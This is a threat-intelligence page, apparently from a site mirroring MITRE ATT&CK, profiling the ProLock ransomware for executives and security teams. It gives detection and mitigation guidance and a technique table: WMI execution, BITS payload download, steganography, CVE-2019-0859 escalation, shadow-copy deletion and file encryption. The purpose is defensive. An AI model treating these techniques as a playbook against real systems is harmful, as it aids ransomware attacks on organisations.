S0654: ProLock
Analyst context for executives and security teams
ProLock matters because MITRE identifies it as a Windows ransomware strain associated with Big Game Hunting operations and often paired with QakBot for initial access. For leaders, the practical issue is not just malware identification; it is whether the organization can detect precursor activity, contain Windows-based execution and persistence, and recover if encryption and recovery inhibition occur.
Executive priority
Treat ProLock as a ransomware-readiness validation case. Executives should ask whether incident response, backup recovery, endpoint telemetry, and Windows administration monitoring can prove coverage for the behaviors linked to this software: WMI execution, BITS abuse, privilege escalation, file deletion, data encryption, and interference with recovery. This is relevant to business continuity, ransomware response decision-making, and audit evidence around resilience controls.
Technical view
ATT&CK does not provide a ProLock-specific detection section, so SOC and IR teams should validate coverage against the related techniques rather than relying on a named-malware signature. On Windows, focus on suspicious WMI execution, abnormal BITS job creation or use, privilege-escalation indicators tied to exploited software, deletion of intrusion artifacts, encryption activity, and actions that reduce recovery options. Relationship context also includes steganography, so teams should consider whether detection logic and triage workflows can surface unusual media or hidden-content transfer patterns when supported by local telemetry.
Likely telemetry
- Windows endpoint process creation and command-line telemetry
- WMI activity logs and remote/local management execution evidence
- BITS job creation, modification, and transfer metadata
- Endpoint file creation, deletion, and mass file modification events
- Privilege escalation and vulnerability exploitation indicators from EDR, OS, and application logs
Detection direction
- Build or validate behavior-based detections mapped to the related techniques because official ProLock detection guidance is not supplied.
- Tune WMI and BITS detections to distinguish administrative software distribution or maintenance activity from unusual execution context, destinations, timing, or parent-child process chains.
- Correlate ransomware impact signals with earlier execution, persistence, privilege escalation, and recovery-inhibition events to improve incident timelines.
- Validate that file deletion and recovery-inhibition events are retained long enough for incident response, since these behaviors can remove evidence or reduce restoration options.
- Use the QakBot relationship as investigation context, not as a required precursor; do not assume every ProLock case begins the same way.
Mitigation priorities
- Prioritize tested, isolated, and recoverable backups, including evidence that recovery mechanisms cannot be easily disabled from compromised Windows endpoints.
- Harden and monitor Windows administrative features such as WMI and BITS rather than blocking them blindly, since they may be business-critical.
- Maintain vulnerability management discipline for privilege-escalation exposure on Windows systems and confirm patch evidence is available for audit and IR scoping.
- Limit administrative privileges and lateral administrative reach to reduce the blast radius if ransomware execution occurs.
- Prepare ransomware IR playbooks that include containment, recovery validation, evidence preservation, and executive decision points.
Analyst notes and limits
The most useful defensive framing is technique-driven. ProLock is described by MITRE as ransomware used in Big Game Hunting operations since at least 2020 and often obtaining initial access with QakBot. The relationships supplied connect it to stealth, execution, privilege escalation, persistence, and impact behaviors, making it a good scenario for testing ransomware resilience across SOC, IR, IAM, endpoint, backup, and vulnerability-management functions.
No official MITRE detection text is provided for ProLock, and the object has no ATT&CK tactics listed directly. The take is therefore based on the official description, Windows platform field, external references, and supplied technique relationships. Local telemetry, asset criticality, administrative baselines, and backup architecture are required to determine actual exposure or coverage.
ProLock
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1070.004 | File Deletion Sub-technique | ProLock can remove files containing its payload after they are executed.CitationGroup IB Ransomware September 2020 |
| Enterprise | T1486 | Data Encrypted for Impact | ProLock can encrypt files on a compromised host with RC6, and encrypts the key with RSA-1024.CitationGroup IB Ransomware September 2020 |
| Enterprise | T1047 | Windows Management Instrumentation | ProLock can use WMIC to execute scripts on targeted hosts.CitationGroup IB Ransomware September 2020 |
| Enterprise | T1197 | BITS Jobs | ProLock can use BITS jobs to download its malicious payload.CitationGroup IB Ransomware September 2020 |
| Enterprise | T1027.003 | Steganography Sub-technique | ProLock can use .jpg and .bmp files to store its payload.CitationGroup IB Ransomware September 2020 |
| Enterprise | T1068 | Exploitation for Privilege Escalation | ProLock can use CVE-2019-0859 to escalate privileges on a compromised host.CitationGroup IB Ransomware September 2020 |
| Enterprise | T1490 | Inhibit System Recovery | ProLock can use vssadmin.exe to remove volume shadow copies.CitationGroup IB Ransomware September 2020 |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 6722a010ee38… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Group IB Ransomware September 2020
Group IB. (2020, September). LOCK LIKE A PRO. Retrieved November 17, 2024.
Open source URL -
[2]
mitre-attack S0654Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.